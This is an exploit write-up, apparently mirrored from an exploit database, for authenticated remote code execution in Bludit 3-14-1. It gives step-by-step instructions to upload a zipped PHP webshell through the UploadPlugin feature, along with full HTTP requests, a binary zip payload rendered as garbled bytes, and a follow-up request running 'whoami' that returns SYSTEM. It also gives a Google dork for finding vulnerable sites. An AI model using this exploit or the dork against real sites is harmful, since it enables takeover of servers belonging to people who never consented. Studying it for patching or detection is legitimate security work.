Share
## https://sploitus.com/exploit?id=PACKETSTORM:171619
# Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)  
# Exploit Author: Alperen Ergel  
# Contact: @alpernae (IG/TW)  
# Software Homepage: https://www.bludit.com/  
# Version : 3-14-1  
# Tested on: windows 11 wampserver | Kali linux  
# Category: WebApp  
# Google Dork: intext:'2022 Powered by Bludit'  
# Date: 8.12.2022  
######## Description ########  
#  
# Step 1 : Archive as a zip your webshell (example: payload.zip)  
# Step 2 : Login admin account and download 'UploadPlugin'  
# Step 3 : Go to UploadPlugin section  
# Step 4 : Upload your zip  
# Step 5 : target/bl-plugins/[your_payload]  
#  
######## Proof of Concept ########  
  
  
==============> START REQUEST <========================================  
  
POST /admin/plugin/uploadplugin HTTP/2  
Host: localhost  
Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------308003478615795926433430552264  
Content-Length: 1820  
Origin: https://036e-88-235-222-210.eu.ngrok.io  
Dnt: 1  
Referer: https://036e-88-235-222-210.eu.ngrok.io/admin/plugin/uploadplugin  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Te: trailers  
  
-----------------------------308003478615795926433430552264  
Content-Disposition: form-data; name="tokenCSRF"  
  
b6487f985b68f2ac2c2d79b4428dda44696d6231  
-----------------------------308003478615795926433430552264  
Content-Disposition: form-data; name="pluginorthemes"  
  
plugins  
-----------------------------308003478615795926433430552264  
Content-Disposition: form-data; name="zip_file"; filename="a.zip"  
Content-Type: application/zip  
  
PK †eˆU a/PK ”fˆUÆ ª)¢ Ä  
a/a.phpíVێÓ0}ç+La BÛìVܖpX®ËJ @V꺭!µƒíÒrûwl7É$mQyà‘<$©çÌÌ93ã¸È]ƒË·ï–óÒ=/.&nbsp;pÝãZ+M5/•¶BÎÈ0>©M†[jłÓB,„õtO̤Ҝ.  
×4;’†e)¨ƒ¼Èה¯9[Z¡dðÆ „Œ&Âd<ó`÷+œN—’y¼Á  
RLÉE¾(í7â}âø‡_‡¥æ3OºÈ'xð>A¯p‚pânÁã¤ëÀ×e¡&œük£‹¼$Øj±ØFýâ á@\@ªgxD¢Ì'áôæQ?½v£ŸöG7ñùZgéññõ“  
j±u  
\õ„±†à/ï¾Îޞ´×T™HÄZu™jœHkª‰È£û§gÑÅ,CÆêRâVjÅ5yùø%}q»ú­„Ä(ŽQK*Ë"Öï¡£;—Ò²·­6z²ZŸgXÊò¢ðíÄ'éûù+ñÌ%  
µj,ÐäàN°ùf,_à8—“‹•[³˜lO€ScsmI«‡¬«H»¯*Sc?i”)i¹´&x@.'”<—¤Ûç]zs^a®·)‚hBz0;f rì‰þǸ0yÕU¥H"ÕÕÿI IØ\“t{có~€J©£ªä²Ë Ö÷š;dÁ³âÙlh†»s%Ç Ö8Nº+«}+Ž­ÿaºržŸŸžÂÂj.  
îvWS²A¿O?nHO?›jžO ¤Ã£Q+ì¯æí^ Ï  
e8©ô*Ô¾"ý¡@Ó2+ëÂ`÷  
kC57j©'Î"m  
ã®ho¹ xŸô Û;’œcçzÙQ  
Ë·[kô¿Ý¯-2ì~¨“æv©¥C€î‘Tþ#k2,UØSŽ¦€­OÁS£Øg˜‚úK †QˆÜ ØIϲòÖ`Ð:%F½$A"t;buOMr4Ýè~–eãΙåØXíÇm˜Ç(s 6A¸3,l>º <N®¦q{s __~t6á¾, ÅèçO´ÇÆ×Σv²±ãÿbÑڒ‘Ug[;pq›eÓÜÅØÿéJ  
Ë}êv‚3ð8´# ŠOµsÈO«ýbƒh±ï°Ÿd—Ë ¹ÿˆ>yþðMröâÁSzöæõÃûÏÜû)}óàeºqQRrf}êê_D Ø0ìu’õv'§öø?@‡ êûOæh'˜Oœ8f—D¼5[à²=b~PK? †eˆU $ €íA a/  
þš®,  
Ù þš®,  
ـø¨j.  
ÙPK? ”fˆUÆ ª)¢ Ä  
$ €¤ a/a.php  
¤eÝ-  
Ù ÷C-  
Ù bj.  
ÙPK ­ ç   
-----------------------------308003478615795926433430552264  
Content-Disposition: form-data; name="submit"  
  
Upload  
-----------------------------308003478615795926433430552264--  
  
  
==============> END REQUEST <========================================  
  
## WEB SHELL UPLOADED!  
  
==============> START RESPONSE <========================================  
  
HTTP/2 200 OK  
Cache-Control: no-store, no-cache, must-revalidate  
Content-Type: text/html; charset=UTF-8  
Date: Thu, 08 Dec 2022 18:01:43 GMT  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Ngrok-Trace-Id: f3a92cc45b7ab0ae86e98157bb026ab4  
Pragma: no-cache  
Server: Apache/2.4.51 (Win64) PHP/7.4.26  
X-Powered-By: Bludit  
.  
.  
.  
.  
  
==============> END RESPONSE <========================================  
  
# REQUEST THE WEB SHELL  
  
==============> START REQUEST <========================================  
  
GET /bl-plugins/a/a.php?cmd=whoami HTTP/2  
Host: localhost  
Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Dnt: 1  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: none  
Sec-Fetch-User: ?1  
Te: trailers  
  
==============> END REQUEST <========================================  
  
==============> START RESPONSE <========================================  
  
HTTP/2 200 OK  
Content-Type: text/html; charset=UTF-8  
Date: Thu, 08 Dec 2022 18:13:14 GMT  
Ngrok-Trace-Id: 30639fc66dcf46ebe29cc45cf1bf3919  
Server: Apache/2.4.51 (Win64) PHP/7.4.26  
X-Powered-By: PHP/7.4.26  
Content-Length: 32  
  
<pre>nt authority\system  
</pre>  
  
==============> END RESPONSE <========================================